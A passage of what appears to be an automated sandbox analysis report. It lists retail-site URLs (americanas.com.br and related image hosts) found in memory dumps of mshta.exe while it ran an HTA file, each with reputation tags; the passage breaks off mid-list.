00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487918630.000000000ABC9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444023676.000000000ABC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png?mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.americanas.com.br/categoria/brinquedos/bonecas/rebornjZmshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.americanas.com.br/categoria/tvmshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411154333.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486943615.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasTmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png.pngmshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hmmshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459140045.0000000009476000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condicimshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438311238.0000000009C1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pngzmshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngMmshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.pngXmshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofamshta.exe, 00000000.00000003.25435794233.0000000009C5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488139096.000000000AC17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422811267.0000000009C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensamshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupommshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466221929.000000000AC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://securepubads.g.doubleclick.net/tag/js/gpt.js_qVmshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A94C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 